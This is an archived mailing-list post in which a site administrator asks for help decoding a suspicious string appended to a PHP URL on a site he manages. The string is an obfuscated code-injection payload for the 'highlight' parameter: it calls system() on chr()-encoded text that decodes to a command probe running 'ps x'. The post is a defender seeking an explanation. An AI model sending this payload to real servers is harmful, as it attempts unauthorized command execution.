One of the sites I manage has had what appears to be some kind of attempt to break in by appending the following to some php related url. &highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(112)%252echr(115)%252echr(32)%252echr(120)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 -- Dale |
Attachment:
PGP.sig
Description: This is a digitally signed message part
- Follow-Ups:
- Re: decode a string.
- From: Keith Roberts
- Re: decode a string.
- Prev by Date: error http 403
- Next by Date: RE: error http 403
- Previous by thread: error http 403
- Next by thread: Re: decode a string.
- Index(es):